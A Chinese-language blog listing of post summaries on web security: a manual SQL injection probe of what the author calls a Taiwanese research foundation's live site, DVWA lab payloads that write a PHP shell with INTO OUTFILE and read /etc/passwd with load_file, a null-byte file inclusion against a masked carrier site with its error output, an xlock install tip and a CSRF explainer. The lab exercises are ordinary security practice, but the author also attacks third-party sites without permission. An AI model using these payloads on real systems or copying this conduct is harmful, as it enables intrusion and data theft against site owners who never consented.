摘要:
昨天看了下dvwa,并学习了下,就有了这篇文章。别干坏事,真被抓了就悲剧了.我只测试了下是否有这个漏洞.不敢深入...大致的看了下该网站,是台湾某个研究基金会的网站,看了下发现很多动态链接。随手测试了下看看是否有注入。发现居然转义了..既然’你转了,那我换个方法把。使用-0 -1判断下是否有问题。0的时候是正常的页面。-1 的时候却返回不同的页面,证明有问题。然后继续猜看能弄到神马。发现order by 注入的时候到15的时候报错了。然后直接就联合查询。看敏感信息了。剩下你懂得。查了下php的版本和当前用户到了这里就没有继续了。测试了下手工注入。 阅读全文
摘要:
下载了dvwa,对SQL注入进行演练。使用了以下语句:写shell:http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/?id='+union+select+2,'hello'+into+outfile+'/tmp/tt32.php'++--+&Submit=Submit#读取文件:http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/?id='+union+select+2,load_file('/etc/passwd 阅读全文
摘要:
Xlock是一个能够在ROOT下锁屏幕的工具。在 APT中直接安装即可!方便操作。在这记录一下,免得以后自己再去找。apt-get install xlockmore 阅读全文
摘要:
某运营商....http://www.xxx.xx/customer/leaveMess.php?IDBaseLine=&cur_language=%2Fetc%2Fpasswd%00Warning: include(/etc/passwd\0.inc.php) [function.include]: failed to open stream: No such file or directory in /liusra2/xxx.xx/web/www/customer/language/language.inc.php on line 11Warning: include() [fun 阅读全文
摘要:
这是当时一个面试题目,对此有点不太理解,技术更新太快了.今天看书的时候发现了这点,从理论上是背下来了,但是根本不理解其意思是什么.书上也很含糊的介绍了下,反正我没看明白到底什么意思.根据官方说法:跨站点请求伪造是通过伪装来自受信任用户的请求来利用受信用的网站,来蛊惑受害者进行一些敏感性的操作。简单的理解为:攻击者通过手工/工具检测发现该网站存在该隐患,精心构造一个连接,等待用户进行点击触发该问题,成功触发以后,根据用户的权限不同,来进行一些敏感的操作,例如删除文章/发表文章/改密码等等.解决方法:1.添加确认的操作. 2.加入验证码.再此记录下.每天进步一点... 阅读全文